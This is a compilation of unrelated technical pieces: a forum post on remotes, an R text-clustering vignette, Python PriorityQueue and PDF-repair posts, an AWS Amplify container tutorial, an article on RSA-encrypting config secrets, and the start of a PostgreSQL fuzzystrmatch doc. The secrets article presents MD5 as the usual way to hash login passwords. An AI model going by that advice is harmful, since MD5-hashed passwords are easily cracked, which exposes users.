Said file loaded into the iRplus Android app OK; utilising my S5's IR blaster, it works. The Robman over at JP-1 remote has kindly cleaned up the codes so that they work better, and it looks like the problem is solved. I've piggy-backed the buttons onto a couple of One 4 All learning remotes for safe keeping.
Thanks for the informative posts guys, very helpful!
kgschlosser
Site Admin
Posts:5508
Joined:Fri Jun 05, 2015 5:43 am
Location:Rocky Mountains, Colorado USA
those one4all remotes are great aren't they? I have a bunch of them. they are well constructed solid remotes and you can hack them.. after all if you can't hack it you don't own it
|
This vignette discusses the new functionality, which is added in the textTinyR package (version 1.1.0). I’ll explain some of the functions by using the data and pre-processing steps of this blog-post.
The following code chunks assume that the nltk-corpus is already downloaded and the reticulate package is installed,
NLTK = reticulate::import("nltk.corpus")
text_reuters = NLTK$reuters
nltk = reticulate::import("nltk")
# if the 'reuters' data is not already available then it can be downloaded from within R
nltk$download('reuters')
documents = text_reuters$fileids()
str(documents)
# List of categories
categories = text_reuters$categories()
str(categories)
# Documents in a category
category_docs = text_reuters$fileids("acq")
str(category_docs)
one_doc = text_reuters$raw("test/14843")
one_doc
The collection originally consisted of 21,578 documents but a subset and split is traditionally used. The most common split is Mod-Apte which only considers categories that have at least one document in the training set and the test set. The Mod-Apte split has 90 categories with a training set of 7769 documents and a test set of 3019 documents.
documents = text_reuters$fileids()
# document ids for train - test
train_docs_id = documents[as.vector(sapply(documents, function(i) substr(i, 1, 5) == "train"))]
test_docs_id = documents[as.vector(sapply(documents, function(i) substr(i, 1, 4) == "test"))]
train_docs = lapply(1:length(train_docs_id), function(x) text_reuters$raw(train_docs_id[x]))
test_docs = lapply(1:length(test_docs_id), function(x) text_reuters$raw(test_docs_id[x]))
str(train_docs)
str(test_docs)
# train - test labels [ some categories might have more than one label (overlapping) ]
train_labels = as.vector(sapply(train_docs_id, function(x) text_reuters$categories(x)))
test_labels = as.vector(sapply(test_docs_id, function(x) text_reuters$categories(x)))
First, I’ll perform the following pre-processing steps :
concat = c(unlist(train_docs), unlist(test_docs))
length(concat)
clust_vec = textTinyR::tokenize_transform_vec_docs(object = concat, as_token = T,
to_lower = T,
remove_punctuation_vector = F,
remove_numbers = F,
trim_token = T,
split_string = T,
split_separator = " \r\n\t.,;:()?!//",
remove_stopwords = T,
language = "english",
min_num_char = 3,
max_num_char = 100,
stemmer = "porter2_stemmer",
threads = 4,
verbose = T)
unq = unique(unlist(clust_vec$token, recursive = F))
length(unq)
# I'll build also the term matrix as I'll need the global-term-weights
utl = textTinyR::sparse_term_matrix$new(vector_data = concat, file_data = NULL,
document_term_matrix = TRUE)
tm = utl$Term_Matrix(sort_terms = FALSE, to_lower = T, remove_punctuation_vector = F,
remove_numbers = F, trim_token = T, split_string = T,
stemmer = "porter2_stemmer",
split_separator = " \r\n\t.,;:()?!//", remove_stopwords = T,
language = "english", min_num_char = 3, max_num_char = 100,
print_every_rows = 100000, normalize = NULL, tf_idf = F,
threads = 6, verbose = T)
gl_term_w = utl$global_term_weights()
str(gl_term_w)
For simplicity, I’ll use the Reuters data as input to the fastTextR::skipgram_cbow function. The data has to be first pre-processed and then saved to a file,
save_dat = textTinyR::tokenize_transform_vec_docs(object = concat, as_token = T,
to_lower = T,
remove_punctuation_vector = F,
remove_numbers = F, trim_token = T,
split_string = T,
split_separator = " \r\n\t.,;:()?!//",
remove_stopwords = T, language = "english",
min_num_char = 3, max_num_char = 100,
stemmer = "porter2_stemmer",
path_2folder = "/path_to_your_folder/",
threads = 1, # whenever I save data to file set the number threads to 1
verbose = T)
UPDATE 11-04-2019: There is an updated version of the fastText R package which includes all the features of the ported fasttext library. Therefore the old fastTextR repository is archived. See also the corresponding blog-post.
Then, I’ll load the previously saved data and I’ll use fastTextR to build the word-vectors,
PATH_INPUT = "/path_to_your_folder/output_token_single_file.txt"
PATH_OUT = "/path_to_your_folder/rt_fst_model"
vecs = fastTextR::skipgram_cbow(input_path = PATH_INPUT, output_path = PATH_OUT,
method = "skipgram", lr = 0.075, lrUpdateRate = 100,
dim = 300, ws = 5, epoch = 5, minCount = 1, neg = 5,
wordNgrams = 2, loss = "ns", bucket = 2e+06,
minn = 0, maxn = 0, thread = 6, t = 1e-04, verbose = 2)
Before using one of the three methods, it would be better to reduce the initial dimensions of the word-vectors (rows of the matrix). So, I’ll keep the word-vectors for which the terms appear in the Reuters data set - clust_vec$token ( although it’s not applicable in this case, if the resulted word-vectors were based on external data - say the Wikipedia data - then their dimensions would be way larger and many of the terms would be redundant for the Reuters data set increasing that way the computation time considerably when invoking one of the doc2vec methods),
init = textTinyR::Doc2Vec$new(token_list = clust_vec$token,
word_vector_FILE = "path_to_your_folder/rt_fst_model.vec",
print_every_rows = 5000,
verbose = TRUE,
copy_data = FALSE) # use of external pointer
pre-processing of input data starts ...
File is successfully opened
total.number.lines.processed.input: 25000
creation of index starts ...
intersection of tokens and wordvec character strings starts ...
modification of indices starts ...
final processing of data starts ...
File is successfully opened
total.number.lines.processed.output: 25000
In case that copy_data = TRUE then the pre-processed data can be observed before invoking one of the ‘doc2vec’ methods,
# res_wv = init$pre_processed_wv()
#
# str(res_wv)
Then, I can use one of the three methods (sum_sqrt, min_max_norm, idf) to receive the transformed vectors. These methods are based on the following blog-posts (see especially www.linkedin.com/pulse/duplicate-quora-question-abhishek-thakur and www.erogol.com/duplicate-question-detection-deep-learning ),
doc2_sum = init$doc2vec_methods(method = "sum_sqrt", threads = 6)
doc2_norm = init$doc2vec_methods(method = "min_max_norm", threads = 6)
doc2_idf = init$doc2vec_methods(method = "idf", global_term_weights = gl_term_w, threads = 6)
rows_cols = 1:5
doc2_sum[rows_cols, rows_cols]
doc2_norm[rows_cols, rows_cols]
doc2_idf[rows_cols, rows_cols]
> dim(doc2_sum)
[1] 10788 300
> dim(doc2_norm)
[1] 10788 300
> dim(doc2_idf)
[1] 10788 300
For illustration, I’ll use the resulted word-vectors of the sum_sqrt method. The approach described can be used as an alternative to Latent semantic indexing (LSI) or topic-modeling in order to discover categories in text data (documents).
First, someone can search for the optimal number of clusters using the Optimal_Clusters_KMeans function of the ClusterR package,
scal_dat = ClusterR::center_scale(doc2_sum) # center and scale the data
opt_cl = ClusterR::Optimal_Clusters_KMeans(scal_dat, max_clusters = 15,
criterion = "distortion_fK",
fK_threshold = 0.85, num_init = 3,
max_iters = 50,
initializer = "kmeans++", tol = 1e-04,
plot_clusters = TRUE,
verbose = T, tol_optimal_init = 0.3,
seed = 1)
Based on the output of the Optimal_Clusters_KMeans function, I’ll pick 5 as the optimal number of clusters in order to perform k-means clustering,
num_clust = 5
km = ClusterR::KMeans_rcpp(scal_dat, clusters = num_clust, num_init = 3, max_iters = 50,
initializer = "kmeans++", fuzzy = T, verbose = F,
CENTROIDS = NULL, tol = 1e-04, tol_optimal_init = 0.3, seed = 2)
table(km$clusters)
1 2 3 4 5
713 2439 2393 2607 2636
As a follow up, someone can also perform cluster-medoids clustering using the pearson-correlation metric, which resembles the cosine distance ( the latter is frequently used for text clustering ),
kmed = ClusterR::Cluster_Medoids(scal_dat, clusters = num_clust,
distance_metric = "pearson_correlation",
minkowski_p = 1, threads = 6, swap_phase = TRUE,
fuzzy = FALSE, verbose = F, seed = 1)
table(kmed$clusters)
1 2 3 4 5
2396 2293 2680 875 2544
Finally, the word-frequencies of the documents can be obtained using the cluster_frequency function, which groups the tokens (words) of the documents based on the cluster in which each document appears,
freq_clust = textTinyR::cluster_frequency(tokenized_list_text = clust_vec$token,
cluster_vector = km$clusters, verbose = T)
Time difference of 0.1762383 secs
> freq_clust
$`3`
WORDS COUNTS
1: mln 8701
2: 000 6741
3: cts 6260
4: net 5949
5: loss 4628
---
6417: vira> 1
6418: gain> 1
6419: pwj> 1
6420: drummond 1
6421: parisian 1
$`1`
WORDS COUNTS
1: cts 1303
2: record 696
3: april 669
4: < 652
5: dividend 554
---
1833: hvt> 1
1834: bang> 1
1835: replac 1
1836: stbk> 1
1837: bic> 1
$`4`
WORDS COUNTS
1: mln 6137
2: pct 5084
3: dlrs 4024
4: year 3397
5: billion 3390
---
10968: heijn 1
10969: "behind 1
10970: myo> 1
10971: "favor 1
10972: wonder> 1
$`5`
WORDS COUNTS
1: < 4244
2: share 3748
3: dlrs 3274
4: compani 3184
5: mln 2659
---
13059: often-fat 1
13060: computerknowledg 1
13061: fibrinolyt 1
13062: hercul 1
13063: ceroni 1
$`2`
WORDS COUNTS
1: trade 3077
2: bank 2578
3: market 2535
4: pct 2416
5: rate 2308
---
13702: "mfn 1
13703: uk> 1
13704: honolulu 1
13705: arap 1
13706: infinitesim 1
freq_clust_kmed = textTinyR::cluster_frequency(tokenized_list_text = clust_vec$token,
cluster_vector = kmed$clusters, verbose = T)
Time difference of 0.1685851 secs
This is one of the ways that the transformed word-vectors can be used and is solely based on tokens (words) and word frequencies. However a more advanced approach would be to cluster documents based on word n-grams and take advantage of graphs as explained here in order to plot the nodes, edges and text.
References:
|
A queue retrieves items in FIFO (first in, first out) order. A priority queue retrieves items based on priority: higher-priority items come first. Well, what happens if you submit items that have equal priorities? It depends on how the priority queue was implemented. Read on for how this is handled in the Python standard library’s queue.PriorityQueue.
Let’s see queue.PriorityQueue in action in a simple case:
>>> from queue import PriorityQueue
>>> q = PriorityQueue()
>>> q.put((1, 'A'))
>>> q.put((2, 'B'))
>>> q.put((3, 'C'))
>>> q.get()
(1, 'A')
>>> q.get()
(2, 'B')
>>> q.get()
(3, 'C')
>>> q.empty()
True
As we can see, we’ve put (priority_number, data) into the queue, and retrieved them using the get() method. We see that lower numbers correspond to higher priorities.
Let’s now add some jobs with equal priorities and retrieve them:
>>> q.put((1, 'My first job'))
>>> q.put((1, 'Another job'))
>>> q.get()
(1, 'Another job')
>>> q.get()
(1, 'My first job')
We did not retrieve items in FIFO order for jobs of equal priority: 'Another job' was fetched prior to 'My first job' even though it was added afterwards. Why does this happen?
Using a min-heap for queue.PriorityQueue
The short version is that we grabbed 'Another job' first, because 'Another job' < 'My first job' alphabetically.
The longer version is that under the hood, queue.PriorityQueue is implemented using heapq, Python’s heap implementation. Every job is an element in a min-heap. A min-heap is a complete binary tree that satisfies the min-heap property: the value of each node is greater than or equal to the value of its parent. The root element will be the node with the minimum value. So to get the next job we want to run, we just grab the element at the top of the min-heap, which, due to the min-heap property, we know will be the job with the minimum priority value, which, remember from above, corresponds to the higher priority.
But where is this comparison done: 'Another job' < 'My first job'? During heap operations, elements are compared with one another (and swapped if needed). In Python, this is done using the rich comparison operator __lt__. 'Another job' will bubble to the top of the heap since 'Another job' < 'My first job'.
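To see that comparison in isolation, here is a minimal sketch that pokes heapq directly with the same (priority, data) tuples; when the first elements tie, the strings decide the order:
>>> import heapq
>>> heap = []
>>> heapq.heappush(heap, (1, 'My first job'))
>>> heapq.heappush(heap, (1, 'Another job'))
>>> heapq.heappop(heap)
(1, 'Another job')
>>> heapq.heappop(heap)
(1, 'My first job')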
How we can solve this
Here’s an approach I used for Python 3.5 (the version of Python I was writing for when I looked into using this functionality). For the application I was working on, I needed to retrieve items based on priority, and for items of equal priority, I needed to retrieve items in FIFO order.
One simple approach if you hit this problem is following a suggestion in the heapq documentation: “store entries as 3-element list including the priority, an entry count, and the task”, where the entry count is a tie-breaker for jobs of equal priority. Let’s see that demonstrated:
>>> q.put((1, 1, 'My next job'))
>>> q.put((1, 2, 'Another job'))
>>> q.get()
(1, 1, 'My next job')
>>> q.get()
(1, 2, 'Another job')
In my situation, I was working in a codebase that already had a mediator interface to submit jobs (to queue.PriorityQueue), and job objects themselves were separate objects (i.e. not simple strings in the real application). I ended up making jobs sortable using the following superclass that implements the __lt__ rich comparison method:
from typing import TypeVar

QueueJobType = TypeVar('QueueJobType', bound='QueueJob')

class QueueJob():
    def __init__(self, order_number: int, task: str) -> None:
        self.order_number = order_number
        self.task = task

    def __lt__(self, other: QueueJobType) -> bool:
        '''
        We need to use the order_number key to break ties to ensure that
        objects are retrieved in FIFO order.
        '''
        return self.order_number < other.order_number

    def __repr__(self) -> str:
        return self.task
When I submitted jobs, I’d do so using an interface like this (application simplified for demonstration purposes, more context is here) that would set the order_number such that it would be monotonically increasing:
import itertools
import queue

class App():
    def __init__(self):
        self.order_number = itertools.count()
        self.queue = queue.PriorityQueue()

    def add_task(self, priority: int, task: str):
        current_order_number = next(self.order_number)
        task = QueueJob(current_order_number, task)
        self.queue.put((priority, task))
Let’s see if jobs with equal priorities are retrieved in FIFO order:
>>> from stuff import App
>>> app = App()
>>> app.add_task(1, 'My first job')
>>> app.add_task(1, 'Another job')
>>> app.queue.get()
(1, My first job)
>>> app.queue.get()
(1, Another job)
Jobs with equal priorities are retrieved in FIFO order, which is what we wanted.
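As a side note (not what I used at the time, just another option): the queue module documentation suggests a dataclass whose payload field is excluded from comparisons, which achieves the same effect as the __lt__ superclass above. A minimal sketch, with the order_number field added by me for the FIFO tie-break:
from dataclasses import dataclass, field
from typing import Any

@dataclass(order=True)
class PrioritizedItem:
    priority: int
    order_number: int                  # tie-breaker for FIFO ordering
    item: Any = field(compare=False)   # payload, never compared

Instances of PrioritizedItem can then be put directly onto the queue.PriorityQueue, with order_number coming from an itertools.count() just like above.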
|
Zero-effort Container deployment for GraphQL and REST APIs and Web Hosting with Amplify CLI
AWS Amplify is the fastest and easiest way to build cloud-powered mobile and web apps on AWS. Amplify comprises a set of tools and services that enables front-end web and mobile developers to leverage the power of AWS services to build innovative and feature-rich applications.
With today’s Amplify CLI release, we’re enabling front-end web and mobile customers to deploy their API (GraphQL & REST) or host their web apps using containers. You can bring your own Dockerfile or Docker Compose and Amplify CLI will automatically build, package and deploy your containers using AWS Fargate.
Benefits:
Portability of your app backend: Amplify CLI provides you with simple container templates to get started, or you can bring your own containers if your team already uses containers for APIs and hosting.
Out-of-the-box infrastructure setup for your container deployment pipeline: Amplify CLI manages infrastructure such as VPC, subnets, NACLs, IAM policies, and other security and infrastructure practices with zero prior knowledge of AWS required. Networking between containers is automatically handled for you, as is SSL generation for hosted sites.
Zero-effort build & deployment pipeline creation: Amplify CLI creates a CodePipeline to build and deploy your images. The pipeline has cost-optimization best practices such as lifecycle policies on build artifacts and images. Docker doesn’t even need to be installed on your system to build and deploy to AWS.
What we’ll build:
First, an ExpressJS server that returns a random number.
Second, an ExpressJS server that runs a FizzBuzz algorithm against a Python/Flask random number generator server.
Prerequisites:
Install the latest Amplify CLI version
Open a terminal and run npm install -g @aws-amplify/cli to update to the latest Amplify CLI.
Amplify CLI is already configured
If you haven’t configured the Amplify CLI yet, follow this guide on our documentation page.
Setup a new Amplify project
Run the following command to create a new Amplify project called “amplify-containerized” or if you already have an existing Amplify project skip to the next section.
mkdir amplify-containerized
cd amplify-containerized
Initialize an Amplify project by running:
amplify init
For the purposes of this blog post, you can just accept all the default values in the amplify init workflow.
Enable container based deployments
Container-based deployments needs to be explicitly toggled on. Run amplify configure project to review your project configuration:
amplify configure project
accept the defaults and answer “yes” when asked if you want to enable container-based deployments:
...
? Do you want to enable container-based deployments? Yes
Add a new container-based ExpressJS API
Amplify CLI will maintain the same DX as for any existing API workflows. Once container-based deployments are enabled, you gain the ability to select “REST” → “API Gateway + AWS Fargate (Container-based)” during the amplify add api workflow.
Amplify CLI supports both GraphQL and REST API options for container based deployments. You can use container-based deployments alongside existing AppSync and API Gateway + Lambda options. For our demo, let’s create a REST API.
To create our first container-based REST API, run the following command:
amplify add api
Choose the following options:
? Please select from one of the below mentioned services:
> REST
? Which service would you like to use
> API Gateway + AWS Fargate (Container-based)
? Provide a friendly name for your resource to be used as a label for this category in the project:
> containerb5734e35
? What image would you like to use
> ExpressJS - REST template
? When do you want to build & deploy the Fargate task
> On every "amplify push" (Fully managed container source)
? Do you want to restrict API access
> No
After a successful completion of the CLI workflow, you’ll see these new files added to your project folder structure.
amplify/backend/api/<your-api-name>
├── amplify.state
├── containerb5734e35-cloudformation-template.json
├── parameters.json
└── src
├── Dockerfile
├── DynamoDBActions.js
├── buildspec.yml
├── index.js
├── package-lock.json
└── package.json
In the src/index.js you’ll find a starter ExpressJS source code that’ll allow you to interact with DynamoDB. Let’s edit that to return a random number.
Replace the index.js file with the following code:
const express = require("express");
const bodyParser = require('body-parser');
const port = process.env.PORT || 3001;
const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
// Enable CORS for all methods
app.use(function (req, res, next) {
res.header("Access-Control-Allow-Origin", "*")
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept")
next()
});
app.get("/", async (req, res, next) => {
try {
res.contentType("application/json").send({
"randomNumber": Math.floor(Math.random() * 101)
})
} catch (err) {
next(err);
}
});
app.listen(port, () => {
console.log('Example app listening at http://localhost:' + port);
});
Now let’s deploy your API:
amplify push
Here’s what’s happening under the hood:
Amplify creates APIs as an ECS Service to ensure that your application is monitored and tasks are in a healthy and active state, automatically recovering if an instance fails. When you make changes to your source code, the build and deployment pipeline will take your source code and Dockerfile/Docker Compose configuration as inputs. One or more containers will be built in AWS CodeBuild using your source code and pushed to ECR with a build hash as a tag, allowing you to roll back deployments if something unexpected happens in your application code. After the build is complete, the pipeline will perform a rolling deployment to launch AWS Fargate Tasks automatically. Only when all new versions of the image are in a healthy & running state will the old tasks be stopped. Finally the build artifacts in S3 (in the fully managed scenario) and ECR images are set with a lifecycle policy retention of 7 days for cost optimization.
Test your new containerized ExpressJS API
The best way to demonstrate the containerized API is just by calling it with cURL. The API endpoint is printed at the end of the “amplify push” command or when you run “amplify status”.
curl https://<YOUR_API_ID>.us-east-1.amazonaws.com/
Deployments for Containers can take a bit longer to build and deploy, but after a few minutes, you can verify the availability by checking the CodePipeline URL printed at the beginning of your “amplify push” command or run “amplify console api”, select the API, and select “CodePipeline”
Note: This is a simple use case just to showcase the workflow. Our ExpressJS template also provides out-of-the-box support to create a CRUD interface for a DynamoDB table. Review our documentation if you’re interested in that scenario.
Multi-container deployments
Amplify CLI fully relies on a Docker Compose configuration to enable multi-container deployments. Amplify automatically infers the Fargate and ECS settings based on your app’s Dockerfile or Docker Compose. Amplify also allows you to have inter-container networking based on the configured ports in your Docker Compose configuration.
To demonstrate that, let’s run amplify add api and select “REST” → “API Gateway + AWS Fargate (Container-based)” → “Docker Compose - ExpressJS + Flask template” value to add a new multi-container API. This will create a following folder structure in your amplify/backend/api/<your-api-name>/ folder.
amplify/backend/api/<your-api-name>/
├── amplify.state
├── <your-api-name>-cloudformation-template.json
├── parameters.json
└── src
├── buildspec.yml
├── docker-compose.yml
├── express
│ ├── Dockerfile
│ ├── DynamoDBActions.js
│ ├── index.js
│ └── package.json
└── python
├── Dockerfile
├── requirements.txt
└── src
└── server.py
The top level docker-compose.yml references the express server and the python server. Docker Compose provides a mechanism to deploy multiple containers at once. For more information on Docker Compose, please review the official Docker Compose guide.
This time we’ll have the Python server return a random number and the ExpressJS runs a FizzBuzz algorithm based on the Python server’s random number. Let’s replace our server.py file with the following content:
from flask import Flask
from random import randrange

server = Flask(__name__)

@server.route('/random')
def hello():
    return str(randrange(100))

if __name__ == "__main__":
    server.run(host='0.0.0.0')
We created a Flask server that has a /random route which returns a random number between 0 and 99.
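If you want to sanity-check the Flask service before pushing, one option (not part of the Amplify workflow, just a local sketch assuming the file is named server.py and sits next to this script) is Flask's built-in test client:
# local_test.py - quick smoke test for the Flask container code
from server import server

client = server.test_client()
response = client.get('/random')
print(response.status_code)   # expect 200
print(int(response.data))     # a number between 0 and 99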
Now let’s edit the express server to interface with the Python server and then run the FizzBuzz algorithm. Start by replacing the content of the index.js file:
const express = require("express");
const bodyParser = require('body-parser');
const http = require('http');
const port = process.env.PORT || 3000;
const app = express();
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
// Enable CORS for all methods
app.use(function(req, res, next) {
res.header("Access-Control-Allow-Origin", "*")
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept")
next()
});
app.get("/fizzbuzz", (req, res, next) => {
// add networking code to Python server code here
});
app.listen(port, () => {
console.log('Example app listening at http://localhost:' + port);
});
Then add the networking logic to interface with the Python server. When deployed to the cloud, you can interface with the other services by specifying the host as “localhost” and the “port” as configured in the docker-compose.yml. If you’re testing locally with the Docker CLI, reference the Python server by it’s Docker Compose container name.
Multiple containers are deployed as a single unit in Fargate (e.g. same Task Definition). This opinionated deployment allows ease of networking between containers on the local loopback interface and avoids extra configuration, costs, operations, and debugging.
Add the following code right below the comment: “// add networking code to Python server code here”
const options = {
port: 5000,
host: 'localhost', // replace with 'python' for local development
method: 'GET',
path: '/random'
};
http.get(options, data => {
var body = '';
data.on('data', (chunk) => {
body += chunk;
});
data.on('end', () =>{
console.log(body);
const randomNumber = body
let fizzOrBuzz = ''
// Add FizzBuzz logic code here
try {
res.contentType("application/json").send({
"newRandomNumber": body,
"fizzOrBuzz": fizzOrBuzz
});
} catch (err){
console.log(err);
next(err);
}
}).on('error', (error) => {
console.log(error);
});
})
Last but not least, add the FizzBuzz algorithm and return the result to the API caller. Add this FizzBuzz algorithm below “//Add FizzBuzz logic here”
if (randomNumber % 15 === 0) {
fizzOrBuzz = 'FizzBuzz'
}
else if (randomNumber % 3 === 0) {
fizzOrBuzz = 'Fizz'
}
else if (randomNumber % 5 === 0) {
fizzOrBuzz = 'Buzz'
}
else {
fizzOrBuzz = randomNumber
}
We’ve got our business logic completed! Let’s deploy our multi-container API by running the following command:
amplify push
Once successfully deployed, you can try to “cURL” the API. You should now be able to see the random number and FizzBuzz result returned:
❯ curl https://<YOUR_API_ID>.execute-api.us-east-1.amazonaws.com/fizzbuzz
{"newRandomNumber":"37","fizzOrBuzz":"37"}
❯ curl https://<YOUR_API_ID>.execute-api.us-east-1.amazonaws.com/fizzbuzz
{"newRandomNumber":"72","fizzOrBuzz":"Fizz"}
Success!
This blog post demonstrated a quick way to deploy single and multiple containers using Amplify CLI. There is so much more to serverless containers that we couldn’t cover in this blog post. This includes:
GitHub trigger-based deployments
Automatically secure an API with Amazon Cognito
Hosting workflows for your web apps
Multi-environment support
Look out for future blog posts on containers and review our documentation for more details.
|
A colleague of ours once accidentally pushed project code to GitHub, and a plaintext email account and password inside that code were exploited; both the company and the individual paid a heavy price for it. So how should sensitive information in code be handled? This article briefly introduces the approach we use in practice.
Encryption of information commonly falls into two categories:
The first category needs no decryption: for example, hashing system login passwords. The password the user types is run through a hash algorithm and the result is stored in the database; on the next login the same algorithm is applied to the input and the result is compared with what is stored. At no point does anyone need to know the original password. MD5 is the algorithm most commonly used for this kind of scheme.
The second category needs decryption: for example, the database credentials written into project code. They are stored in the code as ciphertext, and when the application needs to connect to the database the ciphertext is decrypted to recover the original credentials. Unlike one-way MD5 hashing, this kind of encryption must allow the ciphertext to be decrypted again; the most commonly used algorithm here is RSA.
What we consider here is encrypting the sensitive information in configuration files, i.e. the second category above, and we also use the RSA algorithm. For the details of RSA, Google it yourself; they are not repeated here. You only need to know two points: data encrypted with the public key can only be decrypted with the matching private key, and the public key can be handed out freely while the private key must be kept secret.
Note one issue here: whoever holds the private key can decrypt the ciphertext, so the key must definitely not live in the project code; otherwise, the next time the code ends up on GitHub the key could be used to decrypt everything and the encryption would be pointless. Our strategy is that the keys are managed centrally by operations and placed directly on the production servers; the project only configures the path from which the key is read, so the key cannot leak together with the code.
Below is a Python script for RSA encryption and decryption. It can be used directly to generate an RSA key pair, encrypt a password, or decrypt one; of course, the same can also be done with the OpenSSL tool.
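(For reference, and as an illustration rather than part of our tooling: generating an equivalent 2048-bit key pair with OpenSSL would be roughly openssl genrsa -out private.pem 2048 to create the private key, followed by openssl rsa -in private.pem -pubout -out public.pem to derive the public key.)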
import binascii
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_v1_5

class RsaCrypto():
    '''RSA encryption and decryption helper'''

    def create_rsa_key(self):
        '''Generate an RSA key pair'''
        try:
            key = RSA.generate(2048)
            encrypted_key = key.exportKey(pkcs=8)
            public_key = key.publickey().exportKey().decode('utf-8')
            private_key = encrypted_key.decode('utf-8')
            return {'state': 1, 'message': {'public_key': public_key, 'private_key': private_key}}
        except Exception as err:
            return {'state': 0, 'message': str(err)}

    def encrypt(self, public_key, plaintext):
        '''Encrypt plaintext with the public key, return hex ciphertext'''
        try:
            recipient_key = RSA.import_key(public_key)
            cipher_rsa = PKCS1_v1_5.new(recipient_key)
            en_data = cipher_rsa.encrypt(plaintext.encode('utf-8'))
            hex_data = binascii.hexlify(en_data).decode('utf-8')
            return {'state': 1, 'message': hex_data}
        except Exception as err:
            return {'state': 0, 'message': str(err)}

    def decrypt(self, private_key, hex_data):
        '''Decrypt hex ciphertext with the private key'''
        try:
            private_key = RSA.import_key(private_key)
            cipher_rsa = PKCS1_v1_5.new(private_key)
            en_data = binascii.unhexlify(hex_data.encode('utf-8'))
            data = cipher_rsa.decrypt(en_data, None).decode('utf-8')
            return {'state': 1, 'message': data}
        except Exception as err:
            return {'state': 0, 'message': str(err)}

if __name__ == '__main__':
    print(RsaCrypto().create_rsa_key())
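A quick round trip with the class above (the password string here is just a made-up example):
crypto = RsaCrypto()

# 1. Ops generate the key pair
keys = crypto.create_rsa_key()['message']

# 2. The DBA encrypts the real database password with the public key
cipher = crypto.encrypt(keys['public_key'], 'MyDbPassw0rd!')['message']

# 3. The application decrypts it with the private key at runtime
plain = crypto.decrypt(keys['private_key'], cipher)['message']
print(plain)  # MyDbPassw0rd!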
Taking database password management as an example, here is our workflow.
The key is kept separate from the code. That way, throughout the whole process neither developers nor operations ever see the database password; each role gets just enough information and no more, which reduces the chance of mistakes or leaks along the way.
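To make that last point concrete, here is a rough sketch of what reading the key and decrypting the password at application startup could look like; the environment variable and default path below are hypothetical, and RsaCrypto is the class from the script above:
import os

def load_db_password(encrypted_password_hex):
    # The private key lives on the production server, outside the code base;
    # only its path is configured (the default path here is made up).
    key_path = os.environ.get('RSA_PRIVATE_KEY_PATH', '/etc/app/keys/rsa_private.pem')
    with open(key_path) as f:
        private_key = f.read()
    result = RsaCrypto().decrypt(private_key, encrypted_password_hex)
    if result['state'] != 1:
        raise RuntimeError('Failed to decrypt database password: ' + result['message'])
    return result['message']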
In the workflow above, key-pair generation and password encryption with a chosen key have been implemented in a web interface, which makes them convenient for operations and DBAs to use. The screens look like this:
The screen above is the operations view: it can generate, view, and download keys.
The screen above is the DBA view: a key can be selected and a password encrypted with it to produce the ciphertext.
The two screens are separated by permission: operations can only see the first one, and DBAs can only see the second.
|
Repairing PDF files with Python or compressing PDF files with Python is very simple. Well, that was what I was thinking. Python is very powerful, so repairing or compressing a simple PDF file should be easy, right? Well……
So I was doing the bookkeeping for my own little company TS Intermedia and I had to upload (or mail) all these invoices to the receipt scanner service. I created (of course) a mail Python script for this. But at a certain point PDF files were not imported. I contacted the helpdesk and they told me that the PDF file was “corrupt.” Well, not really corrupt, but there were some strange characters at the beginning of the file. I guess the system that created the PDF files had a bug, so it started with some HTML code.
As I do not like doing work twice…. and in this case manually typing in the numbers, dates and other invoice data of 20+ invoices, I wanted to repair the PDFs so I could upload them.
Mac Viewer
So the fantastic :-) OS X software has a feature called Viewer. Within viewer you can save the PDF you are looking at and guess what…. it fixed the PDF file!
I could upload it to the system and it was converted into usable data.
Now…. again… I’m not the guy that does work twice (manually), so opening, saving and closing 20+ PDF files…. no, I guess not. So while the Mac Viewer app is very good for one file, it was no option.
Github
So I searched for a Python package to help me repair my PDF files. Now, there are a lot of fixes to be found on the internet. But they don’t work. Or they don’t work in Python 3.x, or you need a contract with a third party, as some fixes are just API calls to services that will fix your PDF.
Now there is one catch! It’s not a Python solution at all! It actually uses GhostScript in the background to solve this problem.
GhostScript
Ghostscript is an interpreter for PostScript™ and Portable Document Format (PDF) files. Ghostscript consists of a PostScript interpreter layer, and a graphics library. Sometimes the Ghostscript graphics library is confusingly also referred to simply as Ghostscript. Even more confusingly, sometimes people say Ghostscript when they really mean GhostPDL.
So if you want to use the PDF compressor you need to install GhostScript.
Got a Mac? Then its easy.
brew install ghostscript
Have windows… well… good luck with the installation!
Class version
So, while theeko74’s Pdfc – PDF Compressor works very well, it does not work on folders with multiple files. So I forked the code on GitHub and created another version of it.
I created a class for the function that you can call to compress and repair. Using a class makes it easier for you to use, as you can just call it, or extend it to build an even better version for your needs.
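For the curious: the heart of such a compress/repair step is essentially one GhostScript invocation. A stripped-down sketch of the idea (my own illustration, not the exact code from the repo), assuming the gs binary is on your PATH:
import subprocess

def gs_compress(input_path, output_path, quality='/ebook'):
    """Rewrite a PDF through GhostScript, which both compresses it and
    repairs many malformed files along the way."""
    subprocess.check_call([
        'gs', '-sDEVICE=pdfwrite',
        '-dCompatibilityLevel=1.4',
        '-dPDFSETTINGS=' + quality,   # /screen, /ebook, /printer or /prepress
        '-dNOPAUSE', '-dQUIET', '-dBATCH',
        '-sOutputFile=' + output_path,
        input_path,
    ])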
So to compress and/or repair PDF files you can use the files on my GitHub account.
To use my code, just add import CompressPDF to your code.
And then it’s as easy as…..
import os
import CompressPDF  # the class from my forked repo; adjust the import to match where you placed the file

start_folder = "/your-folder"
compress = 2

p = CompressPDF(compress)

compress_folder = os.path.join(start_folder, "compressed_folder/")
if not os.path.exists(compress_folder):
    os.makedirs(compress_folder)

'''Loop within folder over PDF files'''
for filename in os.listdir(start_folder):
    my_name, file_extension = os.path.splitext(filename)
    if file_extension == '.pdf':
        file = os.path.join(start_folder, filename)
        new_file = os.path.join(compress_folder, filename)

        if p.compress(file, new_file):
            print("{} done!".format(filename))
        else:
            print("{} gave an error!".format(file))
|
ApsaraDB RDS for PostgreSQL provides the fuzzystrmatch plug-in. This plug-in supports the Soundex, Levenshtein, Metaphone, and Double Metaphone algorithms. You can use these algorithms to calculate the similarity and distance between strings.
Soundex
The Soundex algorithm converts similar-sounding words into the same code. However, this algorithm is unsuitable for non-English words.
The Soundex algorithm provides the following functions:
